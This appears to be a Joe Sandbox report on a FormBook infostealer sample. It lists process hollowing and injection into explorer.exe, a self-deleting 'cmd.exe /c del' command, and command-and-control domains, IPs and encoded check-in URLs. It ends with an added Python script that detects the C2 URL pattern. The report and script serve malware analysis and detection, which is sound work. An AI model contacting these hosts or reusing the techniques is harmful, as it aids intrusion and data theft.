          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 100.24.208.97 80
          Source: C:\Windows\explorer.exeDomain query: www.venturivasiljevic.com
          Source: C:\Windows\explorer.exeDomain query: www.lippocaritahotel.com
          Source: C:\Windows\explorer.exeDomain query: www.jiltedowl.com
          Source: C:\Windows\explorer.exeDomain query: www.influenced-brands.com
          Source: C:\Windows\explorer.exeDomain query: www.vicdux.life
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.193.107 80
          Source: C:\Windows\explorer.exeDomain query: www.themiamadison.com
          Source: C:\Windows\explorer.exeDomain query: www.top1opp.com
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.65.245 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.28.148.178 80
          Source: C:\Windows\explorer.exeDomain query: www.slingshotart.com
          Source: C:\Windows\explorer.exeDomain query: www.yorkshirebridalmakeup.info
          Source: C:\Windows\explorer.exeDomain query: www.sitedesing.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.216.127.214 80
          Source: C:\Windows\explorer.exeDomain query: www.helpushelpothersstore.com
          Source: C:\Windows\explorer.exeDomain query: www.saddletaxweigh.info
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Users\user\Desktop\RFQ-BCM 03122020.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 200000
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeProcess created: C:\Users\user\Desktop\RFQ-BCM 03122020.exe 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe'
          Source: explorer.exe, 00000004.00000000.269921839.0000000005EA0000.00000004.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.287343246.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.260542390.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 0000000D.00000002.521588226.0000000007180000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion3 | OS Credential Dumping | Security Software Discovery131 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing11 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

          Behavior Graph ID: 435309
          Sample: RFQ-BCM 03122020.exe
          Startdate: 16/06/2021
          Architecture: WINDOWS
          Score: 100

          Sample-level DNS/IP info: www.therios.net, www.angrybird23blog.com
          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

          Process tree (as drawn in the graph):
          • RFQ-BCM 03122020.exe (started)
            • Dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
            • Signature: Maps a DLL or memory area into another process
            • RFQ-BCM 03122020.exe (started)
              • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (started)
            • DNS/IP info: www.venturivasiljevic.com 154.216.127.214, 49726, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles; www.sitedesing.com 172.67.193.107, 49737, 80 CLOUDFLARENETUS United States; 17 other IPs or domains
            • Signature: System process connects to network (likely due to code injection or exploit)
            • chkdsk.exe (started)
              • Signature: Tries to detect virtualization through RDTSC time measurements
              • cmd.exe (started)
                • conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          RFQ-BCM 03122020.exe | 21% | Virustotal |
          RFQ-BCM 03122020.exe | 22% | ReversingLabs | Win32.Spyware.Noon
          RFQ-BCM 03122020.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsuBF4B.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          13.2.chkdsk.exe.4675830.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          3.0.RFQ-BCM 03122020.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          2.2.RFQ-BCM 03122020.exe.2160000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          13.2.chkdsk.exe.5097960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          3.1.RFQ-BCM 03122020.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.2.RFQ-BCM 03122020.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.RFQ-BCM 03122020.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
          2.0.RFQ-BCM 03122020.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482

          Domains

          Source | Detection | Scanner | Label
          www.sitedesing.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://sitedesing.com/images/Asset | 0% | Avira URL Cloud | safe
          http://www.slingshotart.com/um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe
          www.jiltedowl.com/um8e/ | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://sitedesing.com/404/ | 0% | Avira URL Cloud | safe
          http://www.jiltedowl.com/um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://sitedesing.com/404.html/index.xml | 0% | Avira URL Cloud | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.vicdux.life/um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe
          http://www.influenced-brands.com/um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe
          http://www.themiamadison.com/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.lippocaritahotel.com/um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe
          http://www.sitedesing.com/um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe
          http://www.venturivasiljevic.com/um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Reputation
          www.venturivasiljevic.com | 154.216.127.214 | true | true | unknown
          s.multiscreensite.com | 100.24.208.97 | true | false | high
          jiltedowl.com | 34.102.136.180 | true | false | unknown
          themiamadison.com | 192.0.78.24 | true | true | unknown
          www.sitedesing.com | 172.67.193.107 | true | true | unknown
          slingshotart.com | 34.102.136.180 | true | false | unknown
          pixie.porkbun.com | 44.227.65.245 | true | false | high
          lippocaritahotel.com | 103.28.148.178 | true | true | unknown
          influenced-brands.com | 34.102.136.180 | true | false | unknown
          www.angrybird23blog.com | 104.252.53.222 | true | true | unknown
          www.lippocaritahotel.com | unknown | unknown | true | unknown
          www.jiltedowl.com | unknown | unknown | true | unknown
          www.influenced-brands.com | unknown | unknown | true | unknown
          www.vicdux.life | unknown | unknown | true | unknown
          www.themiamadison.com | unknown | unknown | true | unknown
          www.top1opp.com | unknown | unknown | true | unknown
          www.therios.net | unknown | unknown | true | unknown
          www.slingshotart.com | unknown | unknown | true | unknown
          www.yorkshirebridalmakeup.info | unknown | unknown | true | unknown
          www.helpushelpothersstore.com | unknown | unknown | true | unknown
          www.saddletaxweigh.info | unknown | unknown | true | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.slingshotart.com/um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg | false | Avira URL Cloud: safe | unknown
www.jiltedowl.com/um8e/ | true | Avira URL Cloud: safe | low
http://www.jiltedowl.com/um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg | false | Avira URL Cloud: safe | unknown
http://www.vicdux.life/um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg | true | Avira URL Cloud: safe | unknown
http://www.influenced-brands.com/um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg | false | Avira URL Cloud: safe | unknown
http://www.themiamadison.com/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg | true | Avira URL Cloud: safe | unknown
http://www.lippocaritahotel.com/um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg | true | Avira URL Cloud: safe | unknown
http://www.sitedesing.com/um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg | true | Avira URL Cloud: safe | unknown
http://www.venturivasiljevic.com/um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg | true | Avira URL Cloud: safe | unknown
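
Every URL in the table above shares one path token, /um8e/, and the same two query parameter names, 4h (a long base64-like blob) and z6AhC6 (a short tag, 4h0836-hg), across eight different hosts, while the Avira URL Cloud column reads "safe" for all of them. The URI shape, not the domain, is therefore the useful pivot: the host list rotates, the path and tag stay fixed for the build. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code. It takes the contacted URLs from this table as constructed input (scheme added where the report omits it), adds two benign URLs from the "URLs from Memory and Binaries" table as negatives and two URLs from the "Joe Sandbox View / Context" section (other samples seen on the same IP, with different path tokens) to show that the same shape rule generalises beyond this build, then groups the matches by path. The regex thresholds (a single path segment of 2 to 8 alphanumerics, a blob of at least 40 base64 characters, a tag of at most 24 characters) are assumptions tuned to the URLs on this page, not a published FormBook signature.

```python
"""Pivot a sandbox run's contacted URLs by URI shape rather than by domain.

Added example: groups URLs that share a short single-segment path and a
two-parameter query (one long base64-like blob, one short tag), which is
the shape the check-in URLs in this report have in common.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: the "Contacted URLs" rows of this report (scheme added
# where the report omitted it), two benign URLs from the memory-strings table
# as negatives, and two URLs from the report's Context section (other
# samples on the same IP, different path tokens).
SAMPLE_URLS = [
    "http://www.slingshotart.com/um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg",
    "www.jiltedowl.com/um8e/",
    "http://www.jiltedowl.com/um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg",
    "http://www.vicdux.life/um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg",
    "http://www.influenced-brands.com/um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg",
    "http://www.themiamadison.com/um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg",
    "http://www.lippocaritahotel.com/um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg",
    "http://www.sitedesing.com/um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg",
    "http://www.venturivasiljevic.com/um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg",
    "http://www.apache.org/licenses/LICENSE-2.0",
    "https://cdnjs.cloudflare.com/ajax/libs/lunr.js/0.7.2/lunr.min.js",
    "www.theruthyfoundation.com/ftgq/?C48xf8=VFQ8p8YH&8p=hXrrV6KmgNDYgaMusCisUpQaeMuXCQm/wDS3W/8bIiU7O/afikPnTfdtGvQUzT0iCOule4rqgA==",
    "www.stattests.com/csv8/?8pHXLLhp=SBCaTdph9BFJ+Pe0Ht/T56OwK5/x5qMPVV3KW1n9WrjJ2bCqa9ZEsGfiasNAsnzHUsjd&hbs=CnehJPdp6XLP_rwP",
]

# Shape thresholds are assumptions tuned to this page's URLs, not a published signature.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")        # e.g. /um8e/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long base64-like value
TAG_RE = re.compile(r"^[A-Za-z0-9_-]{1,24}$")        # short per-build tag


def split_query_raw(query):
    """Split name=value pairs without decoding.

    urllib.parse.parse_qsl would turn '+' into a space and decode '%xx';
    here '+' and '/' are part of the blob's base64 alphabet and must survive.
    """
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def _split(url):
    """urlsplit, adding a scheme when the report listed a bare host/path."""
    return urlsplit(url if "://" in url else "http://" + url)


def classify(url):
    """Return 'checkin', 'bare_path' or None for one URL."""
    parts = _split(url)
    if not PATH_RE.match(parts.path):
        return None
    if not parts.query:
        return "bare_path"  # same path, no query: the bare beacon form
    values = [value for _, value in split_query_raw(parts.query)]
    if len(values) != 2:
        return None
    has_blob = any(BLOB_RE.match(v) for v in values)
    has_tag = any(TAG_RE.match(v) for v in values)
    return "checkin" if has_blob and has_tag else None


def summarize(urls):
    """Group matching URLs: which hosts share each path, and which parameter
    names and short tag values recur. One path over many hosts with a single
    tag value is the per-build fingerprint; the domain list is disposable."""
    hosts_by_path = defaultdict(set)
    param_names = set()
    tag_values = set()
    for url in urls:
        if classify(url) is None:
            continue
        parts = _split(url)
        hosts_by_path[parts.path].add(parts.hostname)
        for name, value in split_query_raw(parts.query):
            param_names.add(name)
            if TAG_RE.match(value):
                tag_values.add(value)
    return {
        "hosts_by_path": {p: sorted(h) for p, h in hosts_by_path.items()},
        "param_names": sorted(param_names),
        "tag_values": sorted(tag_values),
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_URLS)
    for path, hosts in sorted(report["hosts_by_path"].items()):
        print(f"{path}: {len(hosts)} hosts -> {', '.join(hosts)}")
    print("query parameter names:", report["param_names"])
    print("short tag values:", report["tag_values"])
```

Run stand-alone, the script reports eight hosts under /um8e/ with the single tag 4h0836-hg, and one host each under /ftgq/ and /csv8/ with their own tags, while the apache.org and cdnjs URLs are ignored. The query is split by hand on purpose: parse_qsl would rewrite the leading "+" of the slingshotart.com blob as a space and silently change the value you would later pivot on.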

URLs from Memory and Binaries

